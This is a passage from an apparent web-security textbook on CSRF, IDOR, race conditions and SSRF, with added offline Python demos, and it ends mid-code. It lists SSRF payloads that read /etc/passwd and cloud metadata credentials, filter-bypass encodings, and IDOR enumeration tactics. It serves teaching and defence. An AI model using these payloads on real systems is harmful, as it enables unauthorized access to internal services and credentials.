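"""Signed double-submit cookie CSRF defence (stateless variant).

Added example, not the book's code. The server keeps no per-request state:
the token in the cookie is nonce.HMAC(secret, session_id:nonce). The form
must echo the cookie value; a cross-site page cannot read the cookie, and a
planted cookie cannot carry a valid MAC for the victim's session.
"""
import hashlib
import hmac
import secrets
from typing import Dict, Optional

SERVER_SECRET = secrets.token_bytes(32)  # per-deployment secret; generated here for the demo


def make_double_submit_token(session_id: str, secret: bytes = SERVER_SECRET) -> str:
    """Token to set in the CSRF cookie and to embed in the form."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_double_submit(session_id: str, cookie_token: Optional[str],
                         form_token: Optional[str], secret: bytes = SERVER_SECRET) -> bool:
    """Accept only if cookie and form agree and the MAC binds the token to this session."""
    if not cookie_token or not form_token:
        return False
    if not hmac.compare_digest(cookie_token.encode(), form_token.encode()):
        return False
    nonce, sep, mac = cookie_token.partition(".")
    if not sep:
        return False
    expected = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected.encode(), mac.encode())


def demo() -> Dict[str, bool]:
    """Constructed scenarios: a genuine post, a tampered form field, and a
    cookie/form pair planted by an attacker who does not hold the server secret."""
    sid = "victim-session"
    cookie = make_double_submit_token(sid)
    planted = make_double_submit_token(sid, secret=b"not-the-server-secret")
    return {
        "legitimate": verify_double_submit(sid, cookie, cookie),
        "tampered_form": verify_double_submit(sid, cookie, cookie + "x"),
        "cookie_tossing": verify_double_submit(sid, planted, planted),
    }


if __name__ == "__main__":
    print(demo())
```

Binding the MAC to the session id is what distinguishes this from the plain double-submit pattern: the equality check alone would accept the "cookie_tossing" case, since cookie and form would match.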
2.6 - IDOR #2.6

Insecure Direct Object References (IDOR) is a security vulnerability that occurs when a web application provides direct access to objects based on user input without verifying proper permissions. This can allow an attacker to access data and resources that they should not have by simply modifying parameters in the URL or requests.

Understanding IDOR

IDOR occurs when an application uses direct object identifiers in URLs or request parameters without properly verifying whether the user has permissions to access those objects. This lack of access control can lead to exposure of sensitive data and manipulation of resources.

Real-life examples of IDOR

Let's look at some real examples to understand how IDOR works and the risks it may entail.

Example 1: Access to User Data

Imagine an account management system where users can view their profiles using a URL like the following:

--------------
https://example.com/profile?id=123
--------------

Where id=123 is the profile identifier of the authenticated user. An attacker who is also a user of the system can change the value of the id parameter to another identifier, for example:

--------------
https://example.com/profile?id=124
--------------

If the application does not verify that the authenticated user has permissions to access the profile with id=124, the attacker can view the profile data of another user.

Example 2: Downloading Sensitive Files

Consider an application that allows users to download their documents using a URL such as the following:

--------------
https://example.com/download?file=invoice123.pdf
--------------

An attacker can modify the value of the file parameter to download a document that does not belong to him:

--------------
https://example.com/download?file=invoice124.pdf
--------------

If the application does not verify access permissions to the invoice124.pdf file, the attacker can download sensitive documents from other users.

Risks and Consequences

IDOR attacks can have several serious consequences:

1. Sensitive Data Exposure: The attacker can access other users' personal, financial or medical information.
2. Resource Manipulation: The attacker can modify or delete resources that do not belong to him, such as logs, files or settings.
3. Legal and Reputational Risk: Exposure of sensitive data can lead to legal consequences and damage the company's reputation.
IDOR prevention

To prevent IDOR attacks, web developers should implement the following measures:

1. Rigorous Access Control: Ensure that all requests accessing specific objects or data verify that the authenticated user has the appropriate permissions.

--------------
// PHP Example
$user_id = $_SESSION['user_id'];
$requested_profile_id = $_GET['id'];

// Verify that the user has permissions to access the requested profile.
// hasAccessToProfile() is application-defined: typically a lookup of the
// profile's owner (or an ACL entry) in the database.
if (!hasAccessToProfile($user_id, $requested_profile_id)) {
    die('Unauthorized access');
}
--------------

2. Use of Indirect Identifiers: Instead of using direct identifiers in URLs, use indirect identifiers that cannot be easily guessed or manipulated by an attacker.

--------------
// Generate a unique, unguessable identifier for each object and store the
// mapping to $object_id on the server; only $unique_id appears in URLs.
$unique_id = generateUniqueIdentifier($object_id);
--------------

3. Server Validation and Authorization: Implement validation and authorization controls on the server to ensure that each request is legitimate and that the user has permissions to perform the requested action.

--------------
// Validate and authorize the request on the server
if (!isValidRequest($request) || !isAuthorized($user, $action)) {
    die('Invalid or unauthorized request');
}
--------------

IDOR is a critical vulnerability that can lead to serious consequences if not handled properly. By understanding how it works and learning from real-world examples, you can better protect your web applications and your users. Implement stringent access controls, use indirect identifiers and ensure server-side validation and authorization to mitigate the risks associated with IDOR.
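Measures 1 and 2 above reinforce each other: the indirect identifier stops guessing, and the ownership check stops a reference that has leaked from being used by anyone else. The following Python is an added example, not the book's PHP: an in-memory document store keeps sequential internal ids private, hands out random opaque references for URLs, and enforces ownership on every read, beside the unchecked direct-id handler that the chapter's Example 2 describes. The store, users and document contents are constructed.

```python
"""Object-level authorization with indirect identifiers.

Added example, not the book's PHP. An in-memory store stands in for the
database: internal ids stay sequential and private, URLs carry an opaque
random reference, and every read checks that the requesting user owns the
record. Users and documents below are constructed.
"""
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional


@dataclass
class Document:
    internal_id: int
    owner: str
    content: str


@dataclass
class DocumentStore:
    docs: Dict[int, Document] = field(default_factory=dict)
    refs: Dict[str, int] = field(default_factory=dict)  # opaque reference -> internal id

    def add(self, owner: str, content: str) -> str:
        """Store a document and return the indirect reference to put in URLs."""
        internal_id = len(self.docs) + 1          # sequential, but never exposed
        self.docs[internal_id] = Document(internal_id, owner, content)
        ref = secrets.token_urlsafe(16)            # 128 random bits: no adjacent values to try
        self.refs[ref] = internal_id
        return ref

    def download_direct(self, internal_id: int) -> Optional[str]:
        """The pattern the chapter warns against: a direct id and no ownership check."""
        doc = self.docs.get(internal_id)
        return doc.content if doc else None

    def download(self, user: str, ref: str) -> Optional[str]:
        """Hardened handler: resolve the reference, then enforce ownership.

        Both failure cases return None so the response does not reveal whether
        a reference exists, which would otherwise help enumeration.
        """
        internal_id = self.refs.get(ref)
        if internal_id is None:
            return None
        doc = self.docs[internal_id]
        if doc.owner != user:
            return None
        return doc.content


def demo() -> Dict[str, bool]:
    """Constructed scenario with two users and one document each."""
    store = DocumentStore()
    alice_ref = store.add("alice", "invoice for alice")
    bob_ref = store.add("bob", "invoice for bob")
    return {
        "owner_can_read": store.download("alice", alice_ref) == "invoice for alice",
        "other_user_denied": store.download("alice", bob_ref) is None,
        "unknown_ref_denied": store.download("alice", "no-such-ref") is None,
        "direct_id_leaks": store.download_direct(2) == "invoice for bob",
    }


if __name__ == "__main__":
    print(demo())
```

Note that `download` takes the authenticated user from the session, never from the request, which is the mistake behind the `?id=124` example: the server must decide who is asking, not the URL.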
Advanced search

IDOR vulnerabilities are a type of authorization flaw that allows attackers to access resources they should not have access to. This occurs when a web application uses user input directly to access objects or data without performing proper authorization checks. This chapter delves into the identification, exploitation and prevention of IDOR.

1. Understanding IDOR

• Definition: IDOR occurs when an application exposes a direct reference to an internal object (such as a file ID, user ID or password) in a URL, form or other medium. If the application does not check whether the user has permission to access that object, an attacker can manipulate the reference to access unauthorized resources.
• Examples:
1. Vulnerable URL: https://example.com/profile?user_id=123 (an attacker could change user_id to view the profile of another user).
2. Vulnerable form: A form that allows users to download invoices, but does not verify if the user has permission to view the requested invoice.

2. Identifying IDOR

Manual analysis:
• Check URLs: Look for parameters in URLs that may be direct references to objects (e.g., id, user_id, file_id).
• Test variations: Attempt to modify parameter values to see if other resources can be accessed.
• Analyze responses: Search for sensitive information that is disclosed without authorization (e.g., user names, email addresses, financial data).

Automated tools:
• Vulnerability scanners: Use web scanners to identify common IDOR patterns (e.g., Burp Suite, OWASP ZAP).
• Traffic interceptors: Analyze the traffic between the browser and the web application to look for direct object references and possible IDOR vulnerabilities.

3. Exploiting IDOR

Parameter manipulation:
• Increment or decrement values: Change the value of an ID parameter to try to access adjacent resources.
• Test predictable values: If the IDs are sequential or follow a pattern, test nearby values to find other resources.
• Use brute-force tools: Automate the testing of different parameter values to find valid IDs.

Privilege escalation attacks:
• Change roles: If the application uses role IDs, try to change the user's role ID to gain access to restricted functions.
• Change user ID: Attempt to change the user ID to impersonate another user and access their data.

Additional Tips

• Pay attention to error messages: Error messages can reveal information about the internal structure of the application and facilitate IDOR exploitation.
• Do not rely on security by obscurity: Hiding IDs is not an effective solution, as attackers can discover them by reverse engineering or guessing.
Bypass protection

Understanding IDOR

IDOR occurs when a web application exposes direct references to internal objects (such as files, database records or user identifiers) without implementing adequate access controls. This allows attackers to manipulate these references to access sensitive data or perform unauthorized actions.

IDOR Protection Avoidance Techniques

Guessing or Predicting Identifiers:
• Description: Attackers attempt to guess or predict sequential identifiers or predictable patterns in object references.
• Example: Changing the user ID in a URL to access another user's data.

Parameter Manipulation:
• Description: Attackers modify the parameters of an HTTP request to access restricted resources.
• Example: Changing the value of a hidden parameter in a form to modify the behavior of the application.

Brute Force Attacks:
• Description: Attackers systematically try different values for identifiers until they find a valid one.
• Example: Automate the testing of different order numbers to find orders from other users.

Enumeration Attacks:
• Description: Attackers collect information about the application structure and valid identifiers.
• Example: Analyze source code or application responses to identify patterns in identifiers.

Timing attacks:
• Description: Attackers measure application response time to infer information about valid identifiers.
• Example: Observe differences in response time when accessing valid and invalid resources.

Race Condition Attacks:
• Description: Attackers exploit race conditions in the application to access temporarily accessible resources.
• Example: Send multiple simultaneous requests to perform an action before access controls are applied.

Real World Examples of IDOR Attacks

• Facebook: In 2019, an IDOR vulnerability was discovered that allowed attackers to access private photos of users.
• Shopify: In 2020, an IDOR vulnerability was disclosed that allowed attackers to access order information from other merchants.
• Instagram: In 2021, an IDOR vulnerability was found that allowed attackers to view and download private photos and videos.
Escalating the attack

IDORs can be exploited in various ways to escalate attacks:

- Data enumeration: An attacker can iterate through a range of identifiers to discover and access additional resources.
- Sensitive data access: An attacker can access sensitive information, such as personal, financial or authentication data.
- Unauthorized modification: An attacker can change the state of resources, such as the status of an order or a user's permissions.
- Data deletion: An attacker can delete resources, such as files or database records.

IDOR Mitigation

- Authorization verification: Implement strict authorization controls for each request that accesses or modifies a resource.
- Use of indirect identifiers: Use indirect identifiers (UUIDs, tokens) instead of direct references.
- Parameter validation: Validate all input parameters to ensure they are valid and expected.
- Principle of least privilege: Grant users only the permissions necessary to perform their tasks.

IDOR detection tools

- Web vulnerability scanners: Burp Suite, OWASP ZAP
- Manual testing: Careful analysis of application requests and responses.

Examples of payloads for detecting IDOR

--------------
GET /api/user/123/profile HTTP/1.1
GET /api/user/124/profile HTTP/1.1
GET /api/user/1/profile HTTP/1.1
--------------

By changing the user ID in the URL, you can try to access other users' profiles if the application is vulnerable to IDOR.

Automating the attack

IDOR (Insecure Direct Object References) vulnerabilities can be exploited manually, but automation allows attackers to scale their efforts and discover a larger number of IDORs more efficiently. This chapter delves into techniques and tools to automate the detection and exploitation of these vulnerabilities.

1. Automated IDORs Recognition

- Objective: To identify patterns and structures in URLs and parameters that suggest the presence of IDORs.
- Tools:
1. Web Crawlers: Collect URLs and website parameters for further analysis.
2. Traffic Analyzers: Examine HTTP requests and responses to identify numerical or sequential patterns in parameters.
3. Custom Scripts: Develop scripts to look for specific patterns in URLs or parameters.
- Example: Use a web crawler to collect all the URLs of a website, then analyze them for parameters containing incremental numeric identifiers (e.g., user_id=123).

2. Parameter Fuzzing

- Objective: To systematically test different parameter values to detect IDORs.
- Tools:
1. Fuzzers: They automatically send different values (numbers, sequences, etc.) to the identified parameters.
2. Penetration testing frameworks: They include parameter fuzzing functionalities.
- Example: Using a fuzzer to send different numeric values to the user_id parameter in a URL and observe if other users' information is accessed.

3. Response Analysis

- Objective: Detect changes in server responses that indicate the existence of an IDOR.
- Tools:
1. Response comparators: Compare the responses
obtained by modifying the parameter values.
2. Custom scripts: Analyze responses for sensitive information that should not be accessible.
- Example: Compare the responses obtained when accessing /user/123 and /user/124 to verify whether data from different users is displayed.

4. Automated Exploitation

- Objective: Once an IDOR has been identified, automate exploitation to gain unauthorized access to data or perform unauthorized actions.
- Tools:
1. Custom scripts: Develop scripts to iterate over different parameter values and perform specific actions (e.g., download files, modify data).
2. Penetration testing frameworks: Some frameworks allow automating the exploitation of IDORs.
- Example: Develop a script that iterates over different values of the order_id parameter to download invoices from other users. In a bug bounty, stop at the minimum proof of impact (one or two records that are not yours): bulk retrieval of other users' data is outside the rules of almost every program.
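As an added example (not code from the book), here is a small Python harness for the enumeration and response-comparison steps described above. It runs against a constructed in-memory API so it works offline; the RECORDS table, the account names and the function names are assumptions. It walks the IDs around one the tester owns and then confirms a hit with the two-account check, which is the evidence a triager expects in a report.

```python
# Constructed stand-in for the target API: an invoice store keyed by order_id.
RECORDS = {
    1001: {"owner": "alice",   "invoice": "INV-1001", "total": 120.0},
    1002: {"owner": "bob",     "invoice": "INV-1002", "total": 80.0},
    1003: {"owner": "carol",   "invoice": "INV-1003", "total": 42.5},
    1004: {"owner": "alice",   "invoice": "INV-1004", "total": 15.0},
    1005: {"owner": "mallory", "invoice": "INV-1005", "total": 9.9},
}

def vulnerable_api(session_user, order_id):
    """GET /invoices/<order_id>: authenticates the session but never checks
    that the caller owns the record (the IDOR)."""
    rec = RECORDS.get(order_id)
    if rec is None:
        return 404, None
    return 200, rec

def fixed_api(session_user, order_id):
    """Same endpoint with the per-object authorization check. A foreign
    record gets the same 404 as a missing one, so IDs cannot be enumerated."""
    rec = RECORDS.get(order_id)
    if rec is None or rec["owner"] != session_user:
        return 404, None
    return 200, rec

def enumerate_candidates(api, session_user, known_id, span):
    """Walk the IDs around one the tester legitimately owns and keep every
    ID that answers 200. Against a real target, api() is an HTTP GET that
    carries the tester's own session cookie."""
    hits = []
    for order_id in range(known_id - span, known_id + span + 1):
        status, _ = api(session_user, order_id)
        if status == 200:
            hits.append(order_id)
    return hits

def two_account_confirm(api, victim, attacker, order_id):
    """Definitive check: the victim account (your second test account)
    fetches its own record and the attacker account fetches the same ID.
    Identical 200 bodies prove the server does not tie the object to the
    session."""
    v_status, v_body = api(victim, order_id)
    a_status, a_body = api(attacker, order_id)
    return v_status == 200 and a_status == 200 and v_body == a_body

def assess(api):
    """The tester controls two accounts: mallory (owns 1005) and alice
    (owns 1001 and 1004). Enumerate as mallory, then confirm only on the
    records alice knows are hers; the rest stay candidates."""
    candidates = enumerate_candidates(api, "mallory", 1005, span=5)
    alice_owned = [1001, 1004]
    confirmed = [oid for oid in alice_owned
                 if two_account_confirm(api, "alice", "mallory", oid)]
    return candidates, confirmed

if __name__ == "__main__":
    for name, api in (("vulnerable", vulnerable_api), ("fixed", fixed_api)):
        print(name, assess(api))
```

The enumeration step alone only produces candidates; the two-account confirmation is what separates an IDOR from a record that is legitimately public, and it is the minimal proof that keeps the test inside bug bounty rules.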

5. Monitoring and Alert

- Objective: Receive real-time notifications when an IDOR is discovered.
- Tools:
1. Custom Scripts: Configure scripts to send alerts via email, Slack, etc.
2. Security monitoring platforms: Integrate IDOR detection tools with monitoring platforms to receive centralized alerts.
- Example: Configure a script to send an email alert whenever a significant change in the server response is detected when a parameter is modified.

Legal and Ethical Considerations

Automation of IDOR attacks must be performed responsibly and ethically. It is crucial to obtain proper consent before testing on third-party systems and to avoid causing damage or disruption.
web vulnerabilities 79
2.7 - RACE CONDITION #2.7

Race Conditions are a type of vulnerability in applications where the behavior of the system depends on the sequencing or synchronization of events that can run in parallel. This type of vulnerability occurs when multiple processes or threads access and manipulate a shared resource simultaneously, without proper coordination, which can lead to unpredictable and often dangerous results.

Understanding Race Conditions

Race conditions occur when two or more operations are executed at the same time and compete for the same resource, causing inconsistency in results. Lack of proper synchronization between these operations can lead to situations where actions overlap, resulting in unexpected or erroneous execution. The classic shape is check-then-act: the code checks a condition (enough balance, ticket still available, coupon not yet redeemed) and then acts on it, but between the check and the action another request has already changed the state.

Real Examples of Race Conditions

To better understand race conditions, let's look at some real-world examples that illustrate how they can manifest themselves and what implications they can have.

Example 1: Bank Transfers

Imagine a banking system where a user can transfer money from his account to another. Consider the following scenario:

- User A has $100 in his account.
- User A initiates two transfers of $50 each to user B's account almost simultaneously.

If the system does not handle the race condition properly, both transfers could read the initial balance of $100 at the same time, and each would compute and write back $50. User A ends with $50 even though $100 was sent to user B: the second deduction is lost and $50 has been created out of nothing. A variant with the same root cause is two transfers of $100 each: both pass the "sufficient funds" check against the original $100 and user B receives $200.

Example 2: Ticket Reservations

Consider a ticketing application for an event. Suppose two users try to buy the last available ticket at the same time. The system must check the availability of the ticket and then reserve it for the user. If both users manage to reserve the same ticket due to a race condition, the system could sell more tickets than available, causing logistical and financial problems.

Risks and Consequences

Race conditions can have serious consequences on applications:

- Data Inconsistencies: Data can be left in an inconsistent or corrupted state, which can affect system integrity.
- Vulnerability Exploitation: Attackers can exploit race conditions to perform unauthorized actions, such as money transfers or resource reservations.
- Service Disruption: Race conditions can lead to system failures, disrupting service and affecting users.

Preventing Race Conditions

To prevent race conditions, it is essential to implement proper synchronization mechanisms. Here are some common techniques:

1. Resource locking: Use locking mechanisms to ensure that only one process or thread can access a shared resource at a time. The check and the update must both sit inside the critical section; locking only the update leaves the check-then-act window open. A threading.Lock serializes threads within one process only; a web application running several worker processes needs the lock in the database (see the next item).

----------
import threading

# Create a lock
lock = threading.Lock()

def transfer(account, amount):
    with lock:
        # Safe operations: check and update under the same lock
        if account.balance >= amount:
            account.balance -= amount
----------
2. Atomic Transactions: Ensure that critical transactions are performed atomically, i.e. as a single indivisible unit.

----------
BEGIN TRANSACTION;
UPDATE accounts SET balance = balance - 50 WHERE account_id = 'A';
UPDATE accounts SET balance = balance + 50 WHERE account_id = 'B';
COMMIT;
----------

The relative update (balance = balance - 50) is computed by the database while it holds the row lock, so two concurrent transactions cannot both subtract from the same stale value. If the application instead reads the balance, checks it and writes back a computed total, the transaction alone does not help: either read with SELECT ... FOR UPDATE, or fold the check into the statement (WHERE account_id = 'A' AND balance >= 50) and verify that exactly one row was updated before crediting B.

3. Double-Checked Locking: Check the condition once without holding the lock and again after acquiring it, so that the lock is taken only when needed and the state cannot have changed between the second check and the action. The usual illustration is lazy initialization in Java, where the volatile modifier is required for the pattern to be correct:

----------
public class Singleton {
    private static volatile Singleton instance;

    public static Singleton getInstance() {
        if (instance == null) {
            synchronized (Singleton.class) {
                if (instance == null) {
                    instance = new Singleton();
                }
            }
        }
        return instance;
    }
}
----------

4. Race Conditions in Web Applications: In the context of web applications, techniques such as lock tokens and optimistic concurrency control can be used to manage concurrent access. With optimistic concurrency each row carries a version number, the update is written as UPDATE ... WHERE id = ? AND version = ?, and a request whose version no longer matches is rejected and retried instead of overwriting a newer state.

Race conditions are critical vulnerabilities that can have serious implications for application integrity and security. Understanding how they work and learning from real-world examples can help you better protect your systems and data. Implement proper synchronization mechanisms, use resource locks and ensure that critical operations are performed atomically to mitigate the risks associated with race conditions.
2.8 - SERVER-SIDE REQUEST FORGERY #2.8

Server-Side Request Forgery (SSRF) is a type of vulnerability in web applications where an attacker can manipulate the server to make requests to arbitrary resources, both internal and external. This vulnerability allows an attacker to interact with internal server services, access sensitive information and, in some cases, execute malicious commands.

Understanding SSRF

The SSRF vulnerability occurs when a web application takes user-controlled input and uses it to generate a request on the server without proper validation. This allows an attacker to redirect the request to a destination of their choice, which can be another server or an internal service. The forged request leaves with the server's network position and implicit trust (internal IP address, security group membership, service tokens), which is what makes it valuable.

Real Examples of SSRF

To better understand SSRF, let's look at some real-world examples that show how this vulnerability can be exploited and its possible implications.

Example 1: Internal Network Scanning

Imagine a system that allows users to provide a URL to preview the content of that page. If the application does not properly validate the URL provided, an attacker can supply an internal URL and perform a scan of the server's internal network.

-----------
import requests

def get_preview(url):
    # The URL comes straight from the user and is fetched by the server
    response = requests.get(url)
    return response.content

# SSRF attack: the "preview" is fetched from an internal address
get_preview("http://192.168.1.1/admin")
-----------

In this example, an attacker could use the get_preview function to access internal services, such as an administration panel on a private network.

Example 2: Metadata Access in Cloud Services

In many cloud computing platforms, such as AWS, there are metadata services accessible at a specific IP address that contain sensitive information. An attacker can use SSRF to access this metadata.

-----------
import requests

def fetch_metadata():
    # The link-local metadata address is reachable only from inside the instance
    url = "http://169.254.169.254/latest/meta-data/"
    response = requests.get(url)
    return response.content

# SSRF attack: the attacker supplies this URL to a function like get_preview above
fetch_metadata()
-----------

In this case, an attacker could obtain sensitive information about cloud instances, such as temporary IAM credentials in AWS (served under /latest/meta-data/iam/security-credentials/). On AWS, IMDSv2 requires a session token obtained with a PUT request before any metadata can be read, which a plain GET-based SSRF cannot supply; enforcing IMDSv2 on every instance is one of the most effective mitigations for this specific impact.

Risks and Consequences

SSRF vulnerabilities can have serious consequences for the security of an application:

• Unauthorized Access: Attackers can access internal resources that are not intended to be exposed externally.

• Data Exfiltration: Attackers can extract sensitive data, such as internal service credentials and metadata from cloud instances.

• Lateral Movement: Attackers can use SSRF to scan and attack other systems within the internal network.

• Command Execution: In some cases, attackers can leverage SSRF to execute commands on internal systems, further compromising the infrastructure.
SSRF Prevention

To prevent SSRF, it is essential to implement security measures that limit the ability of attackers to manipulate server requests. Here are some common techniques:

1. Input Validation and Sanitization: Always validate and sanitize the input provided by the user to ensure that only safe and expected URLs are allowed. Compare the parsed hostname exactly: a substring test ("trusted-domain.com" in netloc) is satisfied by trusted-domain.com.attacker.com and by localhost@trusted-domain.com.

-----------
from urllib.parse import urlparse
import requests

def is_valid_url(url):
    parsed_url = urlparse(url)
    return (parsed_url.scheme in ["http", "https"]
            and parsed_url.hostname == "trusted-domain.com"
            and parsed_url.username is None)

def get_preview(url):
    if is_valid_url(url):
        response = requests.get(url)
        return response.content
    else:
        raise ValueError("Invalid URL")
-----------

2. Internal IP Address Blocking: Implement rules to block requests to internal and reserved IP addresses. Prefix checks on a handful of strings miss 127.0.0.0/8, 169.254.0.0/16 (cloud metadata) and most of 172.16.0.0/12; the ipaddress module already knows every reserved range.

-----------
import ipaddress
import socket
from urllib.parse import urlparse
import requests

def is_internal_ip(ip_address):
    # Private, loopback, link-local, multicast and reserved ranges are all non-global
    return not ipaddress.ip_address(ip_address).is_global

def get_preview(url):
    parsed_url = urlparse(url)
    ip_address = socket.gethostbyname(parsed_url.hostname)
    if is_internal_ip(ip_address):
        raise ValueError("Unauthorized access to internal IP")
    response = requests.get(url)
    return response.content
-----------

Note that the name is resolved twice, once here and again inside requests.get, so an attacker-controlled DNS record can answer with a public address for the check and a private one for the fetch (DNS rebinding). Connect to the address that was checked, or perform the check in the HTTP client's connection hook, and disable automatic redirects (allow_redirects=False), because a 302 to an internal address bypasses the check as well.

3. Use of Proxies: Use proxy servers that can filter and control outgoing server requests.

4. Whitelisting Implementation: Allow only URLs that are on a whitelist of trusted domains.

-----------
from urllib.parse import urlparse
import requests

ALLOWED_DOMAINS = ["trusted-domain.com"]

def is_allowed_domain(url):
    parsed_url = urlparse(url)
    # Exact match on the parsed hostname, never a substring test on netloc
    return parsed_url.hostname in ALLOWED_DOMAINS

def get_preview(url):
    if is_allowed_domain(url):
        response = requests.get(url, allow_redirects=False)
        return response.content
    else:
        raise ValueError("Domain not allowed")
-----------

Server-Side Request Forgery (SSRF) is a critical vulnerability that can severely compromise the security of an application and its underlying infrastructure. By understanding how SSRF works and how attackers can exploit it, you can implement effective security measures to protect your systems. Remember to always validate and sanitize user input, block unauthorized access to internal resources, and use additional techniques such as proxies and whitelisting to mitigate the risks associated with SSRF.
Advanced Search

Server-Side Request Forgery (SSRF) vulnerabilities are a class of security flaws that allow an attacker to send arbitrary requests from the application server to internal or external destinations. This chapter explores techniques and strategies to find and exploit these vulnerabilities, revealing their potential impact and how to mitigate them.

1. What is SSRF?

- Definition: An SSRF attack occurs when an attacker can control the URL to which a server sends a request. This can allow him to access restricted internal resources, perform actions on behalf of the server or even interact with external systems.
- Basic example: A web application that retrieves images from a user-supplied URL. An attacker could enter a URL pointing to a sensitive internal resource, such as an administration panel, and access it through the application's server.

2. Types of SSRF

- Basic: The attacker can directly control the destination URL and sees the full response.
- Blind: The attacker does not see the server's response, but can infer information based on the application's behavior (timing, error messages, or an out-of-band callback to a host the attacker controls).
- Partially blind: The attacker receives a partial or modified response from the server (for example only the status code, the content length, or an error message that embeds part of the body).

3. Techniques for finding SSRF

- Source code analysis: Search for functions that perform HTTP requests, such as file_get_contents, curl or fsockopen.
- Traffic analysis: Examine HTTP requests sent by the application for suspicious patterns, typically any parameter whose value is a URL, hostname or path (url=, redirect=, callback=, webhook=, image=).
- Fuzzing: Sending malicious inputs to the parameters that control the target URLs to check if they are vulnerable.
- Tools: Burp Suite, ZAP, ffuf, etc.

4. SSRF Exploitation

- Access to internal resources: Access to administration panels, cloud instance metadata, internal API interfaces, etc.
- Port scanning: Scanning of internal ports to discover vulnerable services.
- Attacks on other servers: Use of the vulnerable server as a proxy to attack other systems.
- Remote code execution (RCE): In some cases, SSRF can lead to RCE if the target server is vulnerable.

5. SSRF mitigation

- Input validation: Strictly validate target URLs, allowing only specific domains and ports.
- Whitelisting: Use a whitelist of allowed URLs.
- Disable unnecessary protocols: If the application only needs HTTP(S), disable other protocols such as file://, dict://, gopher://, etc.
- Web Application Firewall (WAF): Configure the WAF to block suspicious requests.

Examples of SSRF payloads

- http://localhost/admin
- http://127.0.0.1:8080
- file:///etc/passwd
- dict://localhost:2625/info

Final Considerations

SSRF is a dangerous vulnerability that can have serious consequences. It is crucial that developers and system administrators understand the risks and take steps to prevent and mitigate these attacks.
Bypass protection

Developers implement various protections to mitigate SSRF risks, but crafty attackers are always looking for ways to bypass these defenses. This chapter explores common techniques for bypassing SSRF protection and how defenders can strengthen their systems.

1. Domain and URL whitelisting

1. Protection: Restricts requests to a predefined set of domains or URLs.
2. Bypass:
- Prefix/suffix technique: Adding characters before or after the allowed domain so that a substring, prefix or suffix check still matches. Examples: http://localhost@dominio-permitido.com and its mirror http://dominio-permitido.com@localhost (one part is userinfo and the other the real host; which host the request reaches depends on how the validator and the HTTP client each parse the URL, and the bypass works whenever they disagree), and http://dominio-permitido.com.attacker.com (the allowed name is only a prefix of an attacker-owned host).
- DNS Poisoning: Manipulation of DNS records to redirect to a server controlled by the attacker.
- Open redirection attacks: Exploiting open redirection vulnerabilities in the website to access unpermitted resources: the allowed host is requested, and its redirect sends the server-side client on to the internal target.

2. Domain and URL blacklists

1. Protection: Blocks requests to specific domains or URLs known to be malicious.
2. Bypass:
- IP address obfuscation: Use IP addresses instead of domain names, in hexadecimal (0x7f000001), decimal (2130706433), octal (0177.0.0.1) or shortened (127.1) form, or an IPv6 form such as [::1] or [::ffff:127.0.0.1].
- DNS rebinding: Dynamically change the IP address associated with a domain name, answering with a public address when the filter resolves it and with an internal one when the request is made.
- Use of URL shortening services: Hiding the real URL behind a shortening service.

3. Validating URL schemes

1. Protection: Allow only specific URL schemes (http, https).
2. Bypass:
- Use of alternative URL schemes: file://, gopher://, dict://.
- Newline character injection: Include line breaks in the URL to bypass filters (CRLF sequences inside a gopher:// payload are also how extra protocol lines are smuggled to services such as Redis).

4. Disable URL resolution

1. Protection: Prevent the server from resolving attacker-supplied domain names to IP addresses, for example by accepting only literal addresses from a fixed list.
2. Bypass:
- Directly use IP addresses instead of domain names, in any of the encodings above, if the filter does not compare them after normalization.
- Blind SSRF attacks: Send requests to internal servers and observe the indirect responses to infer information.

5. Filtering of special characters

1. Protection: Block special characters that can be used to inject malicious payloads.
2. Bypass:
- Character encoding: Use URL, hexadecimal or Unicode encoding to bypass filters.
- Use alternate characters: Replace blocked characters with similar characters that are not filtered.

6. WAF (Web Application Firewall)

1. Protection: Detect and block suspicious traffic patterns that may indicate an SSRF attack.
2. Bypass:
- Payload obfuscation: Use encoding and obfuscation techniques to avoid detection.
- Timing attacks: Exploit differences in response times to bypass WAF rules.

SSRF Protective Bypass Defenses

- Strict input validation: Implement multi-layered input validation to ensure that URLs are valid and secure; normalize the URL first and validate the parsed host, not the raw string.
- Whitelist domains and URLs: Restrict requests to a limited set of trusted resources.
- Disable URL resolution: Prevent the server from resolving attacker-supplied domain names to IP addresses.
- Special character filtering: Block characters that can be used to inject malicious payloads.
- WAF (Web Application Firewall): Configure specific rules to detect and block suspicious traffic patterns.
- Monitoring and logging: Log all outgoing requests to identify SSRF attempts.
- Software update: Keep software up to date to correct known vulnerabilities.
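The following is an added Python example, not code from the book, that serves both the prevention section of 2.8 (Input Validation, Internal IP Address Blocking, Whitelisting) and the bypass list above: it reproduces the weak substring and prefix checks, places a hardened validator next to them, and runs this page's bypass payloads through all three. DNS is replaced by a constructed table so the script runs offline; the hostnames, the addresses and the use of inet_aton to model how a resolver accepts decimal or hexadecimal addresses are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_HOSTS = {"trusted-domain.com"}
ALLOWED_SCHEMES = {"http", "https"}

# Constructed DNS table (assumption) so the example runs offline.
FAKE_DNS = {
    "trusted-domain.com": ["93.184.216.34"],
    "trusted-domain.com.attacker.com": ["185.199.108.153"],
    "localhost": ["127.0.0.1"],
}

def stub_resolve(host):
    """Resolve the way a client would: numeric forms (decimal 2130706433,
    hex 0x7f000001, short 127.1) are accepted by inet_aton just as the
    system resolver accepts them; names come from the constructed table."""
    if not host:
        raise ValueError("empty host")
    try:
        return [socket.inet_ntoa(socket.inet_aton(host))]
    except OSError:
        pass
    if host not in FAKE_DNS:
        raise ValueError("unresolvable host: %s" % host)
    return FAKE_DNS[host]

def weak_allowlist(url):
    """The substring check from the prevention section: matches anywhere in netloc."""
    return any(d in urlparse(url).netloc for d in ALLOWED_HOSTS)

def weak_blocklist(url, resolve=stub_resolve):
    """The prefix check from the prevention section: three string prefixes."""
    ip = resolve(urlparse(url).hostname)[0]
    return not (ip.startswith("192.168.") or ip.startswith("10.")
                or ip.startswith("172.16."))

def hardened_allow(url, resolve=stub_resolve):
    """Scheme allowlist, no userinfo, exact host match, and every resolved
    address must be globally routable. Returns the vetted addresses so the
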